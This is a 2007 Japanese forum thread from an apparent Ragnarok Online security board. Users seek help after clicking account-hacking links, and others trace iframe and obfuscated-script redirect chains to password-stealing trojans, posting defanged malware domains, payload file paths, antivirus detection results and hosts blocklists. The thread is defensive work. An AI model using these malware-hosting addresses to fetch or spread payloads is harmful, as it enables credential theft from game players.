と表記されております
安全になったオブジェクト の欄にも上記のトロイのモノが表記されてる状態なのですけれども
これは知り合いの家へ行ってパスなどを変えるだけで済むのでしょうか・・
スレに目を通したのですが、PC知識に乏しいのでやはりOS再インストールするのが最善なのでしょうか・・
アカハックを踏むのも今日が初めてでして、
言葉足らずかも知れませんが宜しくお願いしますorz <>
(○口○*)さん<>sage<>07/12/09 22:32 ID:XUzsG/jE0<> >>853
サイト自体は普通のもの、デジ同人をやっているみたいね。
だが、福建人に改竄されたサイト群のようにHTMLタグより下にIFRAMEタグがある。
サイズは1、URLがttp://urlでその後ろに難読化スクリプトが。
ひょっとしてと勘ぐってしまうね、拍手から連絡してみたが見てくれてるんだかは不明。
ブログの方もなんかコメントがSPAMだらけだし。 <>
(○口○*)さん<>sage<>07/12/09 22:34 ID:fy9VHi1X0<> >これは知り合いの家へ行ってパスなどを変えるだけで済むのでしょうか・・
ブロックできている可能性は高いと思いますが、保証はできません。
確実を期すなら、OS再インストールコースでしょう。
私が同じケースなら安全とは思いつつも、PG2でブロックしつつPCを使用すると思います。
ttp://mutu■s143■xrea■com/
-->index4.html(パっと見は安全そう)
-->nicky.cgi
-->index3.html(パっと見は安全そう)
-->Java Script(多分、仕込まれたもの)
--->ttp://77■221■133■188/■if/go■html
77■221■133■188->ロシアのIP
go.html は403の文字が見えますが、ttp://77■221■133■188/■dif/go■phpを呼びだして
in.cgiをコール。in.cgiは現在確認中…解読面倒くさいorz
go.htmlは「Trojan-Clicker.HTML.IFrame.fp」として検知されます。
疑わしいHTTPオブジェクトとあるように、HTMLを文字コードに変換した羅列を、デコードして
表示させるスクリプトが埋め込まれているだけで、安全なページの可能性もあります。
(仮に安全なページでも、こんな手法で読み込ませようとする所は御免蒙りますが) <>
(○口○*)さん<>sage<>07/12/09 22:52 ID:fy9VHi1X0<> 調べるだけ無駄ぽいので調査放棄 (´・ω・)っ ⌒ ● <>
(○口○*)さん<>sage<>07/12/09 23:00 ID:XUzsG/jE0<> こんなの自分で仕込む訳が無いから仕込まれたで確定か。
仕込まれたIFRAMEタグ部分を検索すると結構ヒットする、連中からして引っ掛けやすいパターンなのかね。
もう自分のサイトにおかしなアクセスあったらサイトのパスも変えないと危ない時代なのかもね。 <>
(○口○*)さん<>sage<>07/12/09 23:09 ID:+PjTmHt60<> 只今友人宅から帰宅しました
やはりOS再インストールしたほうがいいんですよね
出来れば避けたかったのですけれどもorz
今から再インストールの準備に入ります
ご丁寧に返答ありがとうございました <>
(○口○*)さん<>sage<>07/12/09 23:18 ID:fy9VHi1X0<> 頑張れ。
SP+メーカー使って、SP(とHotFix)適用済みCD作って、
それからOSインストールすると随分時間短縮になるよ。 <>
(○口○*)さん<>sage<>07/12/09 23:21 ID:zFTNjNj/0<> >>859
それってメーカーPCでも使えるのかな <>
(○口○*)さん<>sage<>07/12/09 23:35 ID:fy9VHi1X0<> >>860
メーカー製PCの再インストールが、リカバリディスク形式だとインストールには使えない。
OSのディスクがついてきている(OEM版)場合は、使える。
リカバリの後、Hoxfixだけまとめたディスクを実行して、WindowsUpdateを
まとめて全部やるのにはメーカー製PCでも問題無く使える。>>832の末尾参照。 <>
(○口○*)さん<><>07/12/09 23:35 ID:6AKug4WH0<> HotFixのみならOSのディスクは要らん <>
(○口○*)さん<>sage<>07/12/09 23:48 ID:zFTNjNj/0<> >>861.862
即レスサンクス
リカバディスク形式だから無理だね(´・ω・`) <>
(○口○*)さん<>sage<>07/12/10 00:20 ID:dNX9x9lK0<> >>863
いやだから、リカバリの後にHotFixをまとめて実行するのに使うだけでも随分と手間が省けるんだが。 <>
(○口○*)さん<>sage<>07/12/10 00:28 ID:+86pWSI40<> >>863
NECとかのメーカーPCはリカバリタイプだからね
OEMのOS付けてるのはショップブランドくらいだよ <>
(○口○*)さん<>sage<>07/12/10 00:50 ID:ZRNWvmFc0<> 最近じゃリカバリディスクどころかDisk to Diskですよ'`,、'`('∀`)'`,、'`,、 <>
858<>sage<>07/12/10 01:27 ID:MEwgw7Cy0<> やっと再インストール終わりました
これを機にアカハックに対する知識や耐性をもっと付けようかなぁと思いました(´・ω・`)
おやすみなさい <>
まとめ臨時 ◆kJfhJwdLoM<>sage<>07/12/10 02:21 ID:d2Fk/3ub0<> 駄目な顛末 >>816 >>821 >>848
ついさっきまで全部カスペとバスターのフルスキャンをかけて結局何も出ず。
>>839のようなケースと考えてttp://www■p5ip■comをかけてみると
すると一件だけ上記URLの続きに
/script/src/pic002■gif と書いてあったものが引っかかりました。
これが罠としてリスト入りしたのか、他にも在るのかわかりませんが
直接gifのURLをソースチェッカーに掛けると404検出。
上層部分もチェックしてみましたが変なものは見当たらなさげ。
結局、このまま復旧作業を進めることにしました。
ものすごい一人相撲。
でもアップグレード版で直接クリーンインストールできたり
Linuxさわったり被害時にどれだけ切羽つまるか把握。
罠を探ったり検体を確保しに行く人の凄さも実感した次第です。
こんな醜態を晒していますが
各所であがっているhostsリストのまとめすぎたリストの編集が終わりました。
この復旧作業が終わったら、こちらにUPしてみようと思います。 <>
(○口○*)さん<>sage<>07/12/10 09:52 ID:d+leCesx0<> >868
PCに詳しい人とそうでない人の差って、そんなに大きくない。
単に経験があるかないか、が一番大きい。
個人レベルでハクアドレスの調査ってのもそれと同じ。
プロでもなし、素人な個人が出来る事なんてたかが知れてる。
そこまで凄いとか思うレベルじゃないよ。
それと12日に出る今月のWUの内容
>マイクロソフト、12月の月例パッチは“緊急”3件、“重要”4件
>ttp://internet.watch.impress.co.jp/cda/news/2007/12/07/17785.html <>
(○口○*)さん<>sage<>07/12/10 15:44 ID:+e5qaliJ0<> PC歴10年とかでもWordとExcelとIEとOEだけみたいな人もいるから
経験よりやる気かなぁ。ま、PCに限らず何でもだけどさ。 <>
(○口○*)さん<>sage<>07/12/10 16:00 ID:fF1kfvhk0<> >>870
ここで下手にやる気をおこしても怪我の元にしかならないけどね。 <>
(○口○*)さん<>sage<>07/12/10 16:28 ID:Tc5dfpYC0<> OEってなんだ? <>
(○口○*)さん<>sage<>07/12/10 16:30 ID:QxPqBVv50<> >>872
メールソフトのアウトルックじゃね <>
(○口○*)さん<>sage<>07/12/10 16:36 ID:Tc5dfpYC0<> >>873
おおーさんくす。 <>
まとめ臨時 ◆kJfhJwdLoM<>sage<>07/12/10 17:31 ID:FmVclpgg0<> なんとかサイト更新ができるぐらいまでPC環境を復旧しました。
やっとログインができる…。あとはINして何もないことを祈るしか。
PG2の活躍に期待。
VB2008の不正変更の監視-hostsファイルの変更の設定について電話した所、
外部やプログラムでの変更に反応する仕組みとかで
常に拒否・処理を確認する設定でも、
手動での変更には反応しないのでは?と現場の人の返答。
なので手動で追加した場合は、見つかった変更に適用されていれば問題ないそうな。
実用的でないネタとしては
フィッシング詐欺の禁止するWebの登録制限は200ぐらいだそうで
ここに罠ドメインをぶち込もうと思った計画は破綻しました。
VBまみれな文になってしまった。
更にネタっぽいサンプル品も置いておきます。
http://sky.geocities.jp/ro_hp_add/matomesugi_host.txt
http://sky.geocities.jp/ro_hp_add/matomesugi_wwwadd_hosts.txt <>
(○口○*)さん<>sage<>07/12/10 17:44 ID:Sl2P7hZg0<> カスペがアカハックウイルスにつよいのも対策スレやここで検体提出してくれる人が
いるというのが大きいような気がするんだが・・・そうでもないのかな <>
(○口○*)さん<>sage<>07/12/10 18:19 ID:DlQh1Nbv0<> すみませんが、教えていただけないでしょうか。
【 気付いた日時 】12/10 18時前
【不審なアドレスのクリックの有無 】Wikiで踏みました
【 アドレス 】 http://www■qipilang■org/shabi/
【 OS 】 XPのSP2
【使用ブラウザ 】 FireFox 2.0.0.1.1
【WindowsUpdateの有無】 自動でしています
【 アンチウイルスソフト 】 ウイルスバスター2007
【その他のSecurty対策 】 していません
【ウイルススキャン結果】 カスペルスキーオンラインスキャンでは発見されませんでした
【テンプレの参考サイトを読んだか】 ざっと読みました
【hosts変更】わかりません
【PeerGuardian2導入】無し
【説明】
ブログを巡っているとSurtWikiにたどり着き、そのなかでGvGギルド詳細というものが
ありました。知り合いがいたギルドを探すと、解散済みギルドになっていたので
どういう経緯で解散になったのだろうとリンクをクリックしてしまいました。
真っ白なページに飛んだので、慌てて閉じ、カスペルスキーのオンラインスキャンを
しながらそのページをGoogleで検索すると、中国語のページが母体?のようでした。
もう一度Wikiを見ると、ギルドのリンクはすべてそのアドレスになっていることから
怪しいアドレスではと思っています。怪しいアドレス確定であれば再インストール
するつもりです。ですが、今までのまとめやスレにもこのアドレスは載っていなかったので…。
カスペルスキーのオンラインスキャンでも発見されず…。
新種のアカハックアドレスでしょうか?それとも関係ないアドレスなのでしょうか?
パソコンに弱く、判断がつきません…。
申し訳ありませんが、このページの正体を教えていただけないでしょうか。 <>
(○口○*)さん<>sage<>07/12/10 18:25 ID:df0mchWb0<> >>877
BSWikiさんの危険ドメインリストにはいってたので危険アドレス。
国 Domain Name Group
CN qipilang.org xinluoqu.com
カスペで除去するかOS再インストールしてらっしゃい。 <>
(○口○*)さん<>sage<>07/12/10 18:29 ID:DlQh1Nbv0<> あぁぁぁぁやっぱり…orz
BSWikiさんのリストは見ていませんでした。再インストールしてきますorz
ありがとうございました。 <>
(○口○*)さん<>sage<>07/12/10 19:06 ID:d+leCesx0<> 物凄く遅レスなんだが>601
--no-host-lookup オプションって --no-dns-cache オプションとはまた別物?
ちょっと調べた所、別の人がコンパイルした1.5.3ベース(?)のWin32バイナリには
合ったんだが、1.10系には無さそうな気配だった。
廃止又は統合されたのか、別系統の進化したのか、どっちだろう?
gnu.org見たら1.10系で止まってる気配だし。 <>
877<>sage<>07/12/10 19:28 ID:DlQh1Nbv0<> 何度もすみませんが、もう一度教えていただけないでしょうか。
カスペで除去してから再インストールしようとしたのですが、ウイルス自体が
発見できません。FireFoxに、NoScriptというアドオンを入れているのですが
ブロックできたと考えていいのでしょうか。もし隠れてしまっている場合
どうやって探せばいいのでしょうか。
初歩的な質問ですみません。 <>
(○口○*)さん<>sage<>07/12/10 20:16 ID:uRJLI9Eh0<> >>881
>>1
・垢ハックを踏んでしまった時の相談などはMMOBBS/Ragnarok板の総合対策スレへ。 <>
877<>sage<>07/12/10 20:26 ID:DlQh1Nbv0<> 誘導ありがとうございます。総合対策スレで相談してみます。
ありがとうございました。 <>
(○口○*)さん<>sage<>07/12/10 23:20 ID:dNX9x9lK0<> >>882
総合スレ:アカハックのみ取り扱い
セキュスレ:一般的なもの「も」取り扱い
こっちで答えてもいいんですよ。というか、答える内容同じなんだからここで完結させとけ。
現在のテンプレはあくまでも暫定的なもの。
>>596でも触れられてるけど、前スレの時点から相談自体は基本的にセキュスレでやってしまって
構わないってことになってた筈。テンプレの文面にどう反映させようかってとこで止まってるけど。 <>
(○口○*)さん<>sage<>07/12/11 00:04 ID:MDF8R3c40<> 質問です。
リネージュ研究室さんを参照してhosts変更をしようとしています。
スタートメニューから「ファイルを指定して実行」を選択し、次のコマンドを入力します、と
書かれているコマンドを、コピペして開きました。
XPのマシンでは色々書いてあるメモ帳だったのですが、
2kのマシンでは「新しくファイルを作りますか?」と聞かれ、かつ真っ白なメモ帳が
表示されるだけでした。
2kのマシンをお持ちのかた、ちゃんと何か表示されますか・・・? <>
(○口○*)さん<>sage<>07/12/11 00:09 ID:17Uz3OAR0<> >>885
ディレクトリがxpとは異なる
2kはCドライブに入れてるならC:\WINNT\system32\drivers\etc <>
(○口○*)さん<>sage<>07/12/11 02:16 ID:f/52g8m80<> >>876
どうなのかな
ただ検体出してくれる人達がいると対応もかなりはやいだろうねぃ <>
(○口○*)さん<>sage<>07/12/11 02:34 ID:IcjLzHeN0<> それも多いけどやっぱり企業の対応速度も早いと思う
スマンテックとか提出しても長いこと放置してるのとかザラ <>
(○口○*)さん<>sage<>07/12/11 02:39 ID:5H2BBErb0<> セキュリティ意識のある奴はノートンやバスターみたいな
入れても入れなくても変わらん糞ツールは使わん。大抵NODかカスペ入れてる
ノートンとウイルスバスター入れるくらいならavastの方がまだマシ。無料ツールにすら劣るぞ <>
まとめ臨時 ◆kJfhJwdLoM<>sage<>07/12/11 03:43 ID:lbwHhRKw0<> どうやらパソコンQAサイトのttp://pasokoma■jp下の掲示板?には
どこもp5ip■comへのリンクがセットされているのか…
サイト下の掲示板にアクセスするたびにPG2がHTTPブロック反応します。
>>822 で言われたようにドメイン業者の広告になってて
pasokoma■jp下のサイトを見たら、
もう毎回引っかかると見ていいのかもしれませんね。
こんなことを報告したのは、また調べ物で(ry
自分はつくづく危機感無いなと常々思う。
似たケースで>>811 >>820 >>822 >>839
とりあえずp5ip■comをブロックしていることで
現状垢ハックの問題は無いのかも?と…。
>>869 の言われるように見極め経験を積まないとと実感しています。
ここからチラシの裏-------
既出だけどVB2008セーフモードでスキャンかけたら
有無言わさずROファイルのrdefp■dfdとrdlauncher■dfdを削除されて
またインストしなおす羽目に。動作としては正しいけど涙目。 <>
(○口○*)さん<>sage<>07/12/11 07:44 ID:4RoVTMQd0<> >>890
|既出だけどVB2008セーフモードでスキャンかけたら
|有無言わさずROファイルのrdefp■dfdとrdlauncher■dfdを削除されて
|またインストしなおす羽目に。動作としては正しいけど涙目。
ワラタ でもVB2008が信用できるという事の証拠のような気もする。
>>888
|スマンテックとか提出しても長いこと放置してるのとかザラ
あー、そういや、最近シマンテックの返答入ってたなと思って確認。
(これは完了報告の日付で、実際の対応はもうちょっと早いと思われます)
10/30提出→12/10に対応完了報告
11/04提出→12/10に対応完了報告
12/05提出→12/07に対応完了報告(下記参照)
12/04提出→12/06に対応完了報告(下記参照)
12/02提出→12/04に対応完了報告(下記参照)
完了報告[CLOSING]の中にも、これこれのファイルは手動アナライズうんちゃら〜と
記載されてる事もあるので、報告が早い分も、即自動対応しているのではなく、
担当者が将来手動調査しますってことらしい。
|Our automation was unable to identify any malicious content in this submission.
| The file will be stored for further human analysis
やっぱ、時間かかってるねぇ。 <>
(○口○*)さん<>sage<>07/12/11 16:56 ID:4RoVTMQd0<> 1.カスペの保護を切ってから、再開→全部起動→(切ってあったペアレンタルコントロール入る)
ペアレンタルコントロールが何故か大人に切り替えられないので、切ってた。
2.ガンホーのROのページを開く。
3.カスペがブロックwww
子供には有害なページ指定は正しいと思う。あんな会社に関わらせちゃいかんですよ。うん。 <>
(○口○*)さん<>sage<>07/12/11 16:59 ID:4RoVTMQd0<> > ペアレンタルコントロールが何故か大人に切り替えられないので、切ってた。
Windowsにログインしてあるユーザ名登録しないといけなかったのね。
切り替えできたわw <>
(○口○*)さん<>sage<>07/12/11 18:20 ID:QTOp0mh90<> 広義の「出会い系」と言えなくもないからねえ。
携帯サイトの方は、ペアレンタルコントロール強化でいよいよモバゲーの雲行きが怪しくなってきたし。
児童生徒のヒューマンセキュリティが低杉だからか。 <>
(○口○*)さん<>sage<>07/12/11 22:03 ID:Hokdi3Yf0<> 垢ハック対策にPG2を導入してみたのですが
インストール→リストにブロック設定で中国韓国台湾IPリスト追加→必要なIPはそのつど許可
という感じで問題はないでしょうか? <>
(○口○*)さん<>sage<>07/12/11 22:40 ID:2Mrwjw+s0<> >>895
問題ないね <>
(○口○*)さん<>sage<>07/12/11 23:01 ID:A6+c97Bi0<> なんかテコン・拳聖スレに怪しいリンクがべたべた張られてるな。 <>
(○口○*)さん<>sage<>07/12/11 23:12 ID:4RoVTMQd0<> >>897
確実に垢ハックなので削除依頼出してきたよ。
【危険URL】ttp://www■miarakure■com/happy/
サイズ0のiframeでindex1.htmを呼びだしてた。これから検体捕獲作業に入ります。 <>
(○口○*)さん<>sage<>07/12/11 23:13 ID:Hokdi3Yf0<> >>896
ありがとう <>
(○口○*)さん<>sage<>07/12/11 23:26 ID:4RoVTMQd0<> >>898
検出率悪いのもあるねぇ。lin_exeなんか、NOD32、マカフィー、シマンテック含めほとんどがスルー。
検体提出行ってきます。ところで、そろそろ次スレのテンプレを…。
ttp://www■miarakure■com/happy/index■htm
ttp://www■miarakure■com/wiki/index1■htm
ttp://www■miarakure■com/wiki/lin■exe
ttp://www■miarakure■com/wiki/rse■exe
ttp://www■miarakure■com/wiki/ff■exe
->index■htm
-->index1■htm
--->lin■exe
--->rse■exe
--->ff■exe
カスペ検出結果
index■htm : Not Detected
index1■htm : Trojan-Downloader.VBS.Agent.ar
lin■exe : Trojan-PSW.Win32.Magania.bre
rse■exe : Trojan-PSW.Win32.Delf.aih
ff■exe : Trojan-PSW.Win32.OnLineGames.kak <>
(○口○*)さん<>sage<>07/12/11 23:34 ID:rIstMvFW0<> BSWikiの方のリストによるとそのドメインは既出らしいね。
http://smith.rowiki.jp/domain/?miarakure■com (この場合は不要だが、NG対策で■置換)
最近は大人しいのかそうでないのかほんと訳分からんわ。 <>
(○口○*)さん<>sage<>07/12/12 01:23 ID:G53KzHJa0<> aguse.netが、redemptionPeriod(請戻猶予期間)に突入した為に、dnsで引けなくなった模様。
当面は、aguse.jpの利用を促すアナウンスが出ている。
ttp://www.aguse.jp/blog/2007/12/domain-name-expire.html
>今朝がたaguse.netのドメインが期限切れになっていました。
>おかしいです、先日更新したばかりです。
>今日の午前中に最更新(今度は5年)しましたが、まだ全般にいきわたっていないようです。
>aguse.netドメインが期限切れとなってしまい、ただいま復旧作業中です。
>現在は暫定的に http://aguse.jp で運用しております。当面はこちらからご利用いただけますようお願いいたします。 <>
まとめ臨時 ◆kJfhJwdLoM<>sage<>07/12/12 03:13 ID:EYo5DUZB0<> >>898
リネージュ研究室の07/11/26分でも
危険ドメインに追加されているのを確認しました。
それにしても最近の罠はどのMMOでも対応できるように
数種類トロイを置いているような?
逆を言えば大手のMMOの罠URLをリストに加えれば
ある程度の作品をサポートでき無くも無いという妄想。
とりあえず上級者向け?と思われる >>875 のサンプルリストですが
一部重複があったようで修正しました。 <>
まとめ臨時 ◆kJfhJwdLoM<>sage<>07/12/12 03:45 ID:fKXETgZh0<> >>903
上のまとめすぎたサンプルリストをテスト導入してみると
VB2008の不正変更の監視-見つかった変更の表示されるまでの時間が5分以上かかった…。
Hostsファイルの見つかった変更(検出された変更2966)
表示されるまで途中、これ以上続けるとPCが止まる可能性があると
スクリプトの中止の可否を求める表示が出る。
フリーズしかかってる…リストが多すぎたんだ
でも止めたら逆におかしくなるかもと焦るも辛抱。
リストを追加するときは断線していますが
特にこれを導入するならネット接続はしないほうがいいなと思った次第。
ちなみにWindowsDefenderは10秒もかかりませんでした。 <>
(○口○*)さん<><>07/12/12 07:46 ID:6nvwSCYI0<> 第2水曜WU日age <>
(○口○*)さん<><>07/12/12 11:07 ID:G53KzHJa0<> 緊急(3) 重要(4)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms07-nov.mspx
これ以外にも、.NET frameworkのSP1も先月末から提供されているので、利用者は確認を。 <>
(○口○*)さん<>sage<>07/12/12 11:36 ID:vqRlboOy0<> >>900
FFXI、Lineage、SecondLifeの3点セットであることと
Packerの使い分けから見ると
qipilang■org xinluoqu■com caremoon■net と同一犯と思われ。 <>
(○口○*)さん<>sage<>07/12/12 21:12 ID:4kHDVik50<> 福建人どもは2ちゃんにここ数日フリーストレージ使った罠書き込みをしてるようだ。
今日の罠ファイルはこれ
Fish Hunter @@
www■upfordown■com/files/4193/fishhunter■rar
で、そのupfordownにこれ以前のものを通報ついでになんか対策しないのと聞いてみると
対策するつもりはない、見つけたらその度通報しろ。
そうでなきゃURL書き込めないようにするなりしとけとでも言う感じの返答だった。
そして返信してきたメアドもupfordownのじゃなくてHotmailなんだよね。
と言うことで行くことも使うことも無きゃNG&hosts入りにして良いんじゃね? <>
(○口○*)さん<>sage<>07/12/12 21:21 ID:vqRlboOy0<> 本音を言えば、そんなあからさまなツールに手を出すようなミジンコBOTerは
勝手に踏んでハクられればいいんじゃないかと思う。 <>
(○口○*)さん<>sage<>07/12/12 21:30 ID:PW1Yaci80<> >>908
Kaspersky - - Backdoor.Win32.Hupigon.acma
McAfee - - -
NOD32v2 - - probably unknown NewHeur_PE virus
Symantec - - -
誰かがやってそうな気がするけど、被っても実害ないので、検体提出いってくるです。/(^^) <>
(○口○*)さん<>sage<>07/12/12 21:55 ID:vqRlboOy0<> rar解凍して出てくるファイルのうちwinloadが罠な気がする
(Windowerと同HelperはFFXIのポピュラーな窓化ツール、もうひとつはツール?)。
で、winloadはWin32PEが2つくっついてるという典型的なトロイ
(ドロッパ+トロイ)の形態で、さらに前半がPacker使用(ASPack)で怪しげ。 <>
まとめ臨時 ◆kJfhJwdLoM<>sage<>07/12/13 04:15 ID:m+cS60ck0<> >>908
www■upfordown■comで検索をかけてみると
公表されているものは全部罠だったりします。
既に該当するストレージサービスを使っている人は困るかもしれませんが
独断で注意書きのコメント行を添えてリストに加えることにしました。
あと他のMMOでも見つかっている罠は大体共通だったりしますので
リネージュ研究室さんが更新のたびに加えられる危険ドメインもリストに加えようと思います。
ここからチラシの裏--------
マカフィーオンラインスキャンの動作が重くてたまらない…。 <>
(○口○*)さん<>sage<>07/12/13 04:25 ID:Zsc7fHkl0<> カスペオンラインでいいじゃないかw <>
まとめ臨時 ◆kJfhJwdLoM<>sage<>07/12/13 05:30 ID:VE4XdqWJ0<> >>913
いつもカスペなんですが、たまには他ので試してみようかなと…。
動作の速さとファイルのチェック数から言って
踏んでしまったときのチェックはやはりカスペ推奨なのを実感。
もちろんカスペ一辺倒でなく複数で試すと検出率が高まるわけですが
手早くできるってのは緊急時には欠かせない。
そういえばNOD32ってオンラインスキャンが無いんだなあと…。 <>
(○口○*)さん<>sage<>07/12/13 06:21 ID:2w6vJ3q/0<> >>914
これじゃないの?
http://www.eset.com/onlinescan/ <>
(○口○*)さん <>sage<>07/12/13 13:10 ID:+RgBJEYm0<> F-Secureの体験版を使用しているのですが、その前に試していたカスペがよかったのでこちらを購入しようと思い質問に参りました。
その際、体験版は普通にプログラムの削除からアンインストール→カスペインストでよろしいでしょうか。
以前使っていたバスターの時は、アンインストの後レジストリごと消すアンインストも行ったので、別に方法があるのかと思った次第です。
会社によって完全アンインストが違うようなので教えて頂ければ幸いです。 <>
(○口○*)さん<>sage<>07/12/13 13:26 ID:6CQpnmU20<> >>916
会社によって違うと思うならまず会社に確認しよう。
ttp://www.f-secure.co.jp/support/support-menu/client_security-install-update.html <>
(○口○*)さん<>sage<>07/12/13 15:48 ID:baLcJZq30<> スレの更新時期で丁度良かったので言及しますが、本スレ
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/917
の件。
元よりROセキュリティWikiは『テンプレ作成の為の場』みたいな位置付け
だったから、スレのテンプレから外すべきかと思います。べつに
『弓手Wikiの中の人仕事汁』とか非難の意図は全く無くて、元から
目的が違う(そもそも管理人不在と明言されている)のだから使い方が
ズレかけています。
>>914
大手3社の物は基本的にこの分野に向いてないですね。いろんな環境が
あるので夫々を試してみる事もありますが、その定評は覆りませんでした。
全くの無駄ではないとは思いますし、その事実を追試して確かめて貰うのも
意味ある行為かもしれません。
私も知識が無い部類ですが、そのような前向きな意思と努力は己の向上に
繋がる物だと経験が語ってくれています。まだ先は遠いように思えますが。
いろんな意味で頑張ってください。 <>
(○口○*)さん<>sage<>07/12/13 15:49 ID:baLcJZq30<> みすった、URIは
アカウントハック総合対策スレ9
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/125
ですね。 <>
(○口○*)さん<>sage<>07/12/13 16:03 ID:9CNjocnK0<> 入れといて欲しいに1票。
ここで検討したテンプレの修正とかあるし、検体提出先まとめとかも活用させて貰ってるし。
将来的には、踏んだ時の対応策とかの整理を進めるのにもいいかなとか。
あと、相談の分類なんとかしましょうよ。答える事同じなのに、こっちいけあっちいけされる
相談者も、同じ質問何度もよむこっちも面倒。TOPの誘導も、こっちに振ってもらってる訳なのに
アカハック踏んだ事例だと移動しろってのも変でしょ。
総合スレ:情報のまとめと、アカハック事例の相談
セキュスレ:一般的話題と、アカハック一般取り混ぜた相談(総合スレに誘導しないで回答する) <>
(○口○*)さん<>sage<>07/12/13 16:36 ID:680dLnM80<> 福建人の2ちゃん定時爆撃がはじまった。
今日の罠はこれ、別のフリーストレージ使ってる。
FFXI APP setup @@
www■mediamax■com/dankity/Hosted/APPv4■rar
調べた時点でカスペエンジンをスルーしている、それによりF-Secureもスルー。
16時15分時点で検出できたもの。
AntiVir 7.6.0.40 2007.12.12 HEUR/Crypted
AVG 7.5.0.503 2007.12.12 Potentially harmful program Ardamax.NI
DrWeb 4.44.0.09170 2007.12.12 BackDoor.Pigeon.origin
eSafe 7.0.15.0 2007.12.12 Suspicious Archive Structure
F-Prot 4.4.2.54 2007.12.12 W32/Heuristic-162!Eldorado
Ikarus T3.1.1.12 2007.12.13 Backdoor.Win32.HacDef.073.B
NOD32v2 2720 2007.12.12 probably unknown NewHeur_PE virus
Sophos 4.24.0 2007.12.13 Mal/Delf-G
TheHacker 6.2.9.157 2007.12.12 Backdoor/Hupigon.acma
VBA32 3.12.2.5 2007.12.10 Backdoor.Win32.Delf.cir
VirusBuster 4.3.26:9 2007.12.12 Packed/ExeSt
Webwasher-Gateway 6.6.2 2007.12.12 Virus.Win32.FileInfector.gen (suspicious)
upfordownはリネージュ資料室も危険ドメインリストに入れたみたい。
これも様子見て連爆するようなら入るかも。 <>
(○口○*)さん<>sage<>07/12/13 16:46 ID:6CQpnmU20<> ツールは俺は今後パスする。
実行するようなBOTerは滅びればいい。 <>
(○口○*)さん<>sage<>07/12/13 17:01 ID:680dLnM80<> >ツールは俺は今後パスする。
それでいいんじゃね? <>
(○口○*)さん<>sage<>07/12/13 17:12 ID:6CQpnmU20<> ここを鑑定スレ代わりに使うミジンコBOTerが湧くのを
危惧しているだけなんだ。
2chセキュ板の検出スレに湧いていたように。
# BOTNEWS Light、更新されていないねぇ。 <>
(○口○*)さん<>sage<>07/12/13 18:03 ID:sp2F5/9X0<> 管理板 - 管理人からのお知らせ
56 名前:neun ★:07/12/13 17:52 ID:???0
本日(16:50頃)より、中華人民共和国及び大韓民国の逆引きホスト名からの書き込みを
管理板を除く全ての板で一時的に拒否することとしました。
理由はspam書き込みやアカウントハックを目的とした書き込みが多いためです。
近日中に当該国のIPアドレスによる制限へ切り替え予定です。
とのこと。 <>
(○口○*)さん<>sage<>07/12/13 18:23 ID:wC4VBDkA0<> たびたびこちらや、アカハック対策スレに書き込みお世話になっているものです。
>>885でもありがとうございました。ファイルを発見して、ホストを追加できた・・・と思います。
今日は軽い雑談というか、ある意味物凄いグロ画像を持ってきました。
リンクを貼るのはスレの性質上好ましくないと思うので場所のみを。
ぴころだのworld1の1197537172834「セキュ雑談スレPG2による不審なアクセスのブロック画像 」です。
以前こちらでも相談させていただいた、2度アカハックにあった、2kのマシンなのですが、
マシンを買ったときに付いてきたCDを無くしてしまい、OS入れ替えができないため、
お金が入ったらXPのOSを買ってきて、それから入れ直しをしようと思っています。
ただ、それまでずっとアップデートを放っておくのもちょっと怖かったので、
たまに回線を繋いでは、ウインドウズアップデートやセキュリティソフトの更新を
していたのですが、今回の画像はその際にPCを立ち上げたときに出たものでした。
いや何ていうかもう、ゾっとしたとしか言いようがありません・・・。
カスペルスキーの試用版でウイルスを捕まえてファイルを削除して
完全スキャンをかけているところです・・・。 <>
(○口○*)さん<>sage<>07/12/13 18:40 ID:9CNjocnK0<> >>926
送信側か、受信側かにもよるんだが。
IPによっては危険性ない場合もあるし、あれじゃ、判断のしようがないな。 <>
(○口○*)さん<>sage<>07/12/13 18:54 ID:wC4VBDkA0<> >>927
受信側は全て私のほうのIPで、送信側の方が海外?のようです。
これはつまり、ウイルスがパスワードなり何なりの情報を取得して、
相手側に流すのを防いでいる、ということでしょうか?
ブロックの過去ログを詳しく見てみたところ、丁度
「カスペルスキーオンラインスキャンで脅威が見つかったけれど、
avastが邪魔だからアンインストすれ」とカスペさんに言われて
avast→カスペ への移行時間の間のまごまごしていたあたりから
わんさかアクセスがきていたようです。中国韓国だけでなく、香港台湾もろもろ。
PG2の大事さを痛感いたしました。
ちなみに見つかったウイルスは、svhost■イーエックスイー(英文字)の
キンタマウイルスというものだったようです。
winnyをやっていなければ大丈夫、と解説サイトには書いてありましたが、
現に外部へ何かしらの情報を持ち出そうという働きが見られたので、
大丈夫か〜なんてのんきにしていてはいけないのだなと思いました。 <>
(○口○*)さん<>sage<>07/12/13 18:56 ID:wC4VBDkA0<> すみません間違えました、送信元 が私のほうのIPで
送信先、が海外 が正しいです。 <>
(○口○*)さん<>sage<>07/12/13 20:53 ID:eUWv3gIQ0<> 【 気付いた日時 】 つい先ほど
【不審なアドレスのクリックの有無 】LiveRoのボス対策会議スレ26のレス番620をクリックしました←以前にも見たことのあるURLだと思います。
(内容も動画も見覚えがあります)
【 アドレス 】 ttp://ragnagate■gamehankook■com/zboard/zboard■php?id=screen4&page=1&divpage=56&ss=on&no=286694
【 OS 】 WindowsXPHomeEdition Servicepack2
【使用ブラウザ 】 Sleipnir Ver 2.6.1
【WindowsUpdateの有無】 自動更新が来る度に実施、最終日時は不明です
【 アンチウイルスソフト 】 カスペルスキーインターネットセキュリティ7.0
【その他のSecurty対策 】 Spybot S&D
【 ウイルススキャン結果】 カスペルスキー最新定義でスキャン、何も見つからず。
【テンプレの参考サイトを読んだか】 今から読みます
【hosts変更】わかりませんが無と思います
【PeerGuardian2導入】有ですがつい先ほどテンプレより追加しました。
【説明】
ラーゲが危ないということは知らず、前にも見たことのあるURL(色が変わっていた)だったため深く考えずにクリック。
その数レス後でハックURLらしいということを知り相談に参りました。
最初にクリックしたのは数週間前だったと思います、カスペルスキーの定義は自動で常に最新にしていて、
かつ週に1度は必ずスキャンするようにしていますが一度も反応はありませんでした。
その間垢ハックにあったことはありません。
休止気味のためメイン装備等はほぼアカウントになく、課金も切れているため今は切羽詰った状況ではありませんが
やはり気持ちが悪いため、何かできる事などあればご教示下さい。
宜しくお願い致します。 <>
